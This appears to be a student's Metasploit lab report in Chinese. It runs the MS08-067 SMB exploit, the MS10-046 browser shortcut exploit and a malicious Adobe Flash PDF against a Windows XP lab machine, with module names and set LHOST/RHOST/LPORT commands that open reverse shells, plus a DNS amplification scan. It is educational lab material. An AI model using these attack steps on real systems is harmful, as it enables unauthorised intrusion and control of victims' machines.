zoukankan      html  css  js  c++  java
  • 20155210 Exp5 MSF基础应用

    Exp5 MSF基础应用

    一个主动攻击实践,MS08-067

    • 首先利用msfconsole启用msf终端

    • 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块

    如图:

    • 根据上图,我们输入use exploit/windows/smb/ms08_067_netapi,选择相应的模块

    • 然后我们可以使用show payloads,查看可以使用的模块

    如图:

    • 然后根据上图,为获取靶机的shell,所以利用set payload generic/shell_reverse_tcp

    • 然后输入show options,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target
      如图:

    • 输入

    set RHOST 192.168.241.138
    set LHOST 192.168.241.134
    set LPORT 5210
    

    进行配置

    • 然后我们再次利用show options,查看配置信息
      如图:

    • 然后exploit进行监听

    如图:

    • 如果出现如下情况,关闭防火墙,就可以解决

    针对浏览器的攻击,ms10_046

    • 起初我打算做ms11_050,攻击IE浏览器,但是IE8.0版本,不能成功,可能是IE8.0已经修复相关漏洞了。

    • 所以我选择了ms10_046,首先输入search ms10_046查找漏洞

    如图:

    • 由于我们要对浏览器进行攻击,所以我们输入use use exploit/windows/browser/ms10_046_shortcut_icon_

    • 然后我们输入show payloads,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp

    如图:

    • 我们利用show options查询需要配置的有,LPORT,LHOST,SRVHOST

    • 输入

    set SRVHOST 192.168.241.134
    set LHOST 192.168.241.134
    set LPORT 5210
    

    进行配置

    • 再次查看配置信息

    如图:

    • 然后输入exploit生成URL

    如图:

    • 在windows端访问该URL,kali端如图:

    • 输入sessions,可看到一个ID为1的连接
      如图:

    • 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。
      如图:

    针对客户端的攻击

    • 首先还是先利用search adobe进行搜索
      如图:

    • 然后进行选择,我选择的是use windows/fileformat/adobe_flashplayer_button

    • 然后set payload windows/meterpreter/reverse_tcp,设置所用荷载,利用show options查看所要配置的信息
      如图:

    • 输入如下代码,对LHOST,LPORT,FILENAME进行配置

    set LHOST 192.168.241.134
    set LPORT 5210
    set FILENAME 20155210.pdf
    
    • 输入exploit,生成20155210.pdf文件
      如图:

    • 输入use exploit/multi/handler,进入监听,并设置监听端口,主机号

    • 在windows端,打开20155210.pdf,成功回连
      如图:

    辅助模块应用

    • 首先利用show auxiliary,查看辅助模块

    • 我选择的是scanner/dns/dns_amp,扫描dns

    • 输入show options,查看配置

    • 输入exploit进行监听

    基础问题

    • 用自己的话解释什么是exploit,payload,encode

    • exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击

    • payload:相当于shellcode前身,也就是后门的模板

    • encode:对payload进行编码

    实验体会

    我们应该尽可能的,去更新最新版的软件和系统,否则就会给黑客可乘之机。

    比如,我们做的实验都是基于xp系统的,但是如果对win7、8、10,进行攻击则无效。

    比如,我在做实验2时,想做老师给的例子,但是那个漏洞对IE8.0不好使。

    我们没有一个可以针对现用系统或者软件的渗透攻击库,离实战还是很远的

  • 相关阅读:
    AppleScript
    iOS 架构之文件结构
    Swift
    ERROR ITMS-90032: "Invalid Image Path
    ios中微信原生登陆的坑,ShareSDK的坑
    ios中OC给js传值的方法
    mac电脑中xcode怎么恢复还原快捷键设置
    ios 中 数组、字典转成json格式上传到后台,遇到的问题
    ios 中长按图片或者二维码,保存图片到手机的方法
    ios 中 Plus屏幕适配的问题,xib创建的cell在 Plus出现被拉大的情况
  • 原文地址:https://www.cnblogs.com/panyinghao/p/8921439.html
Copyright © 2011-2022 走看看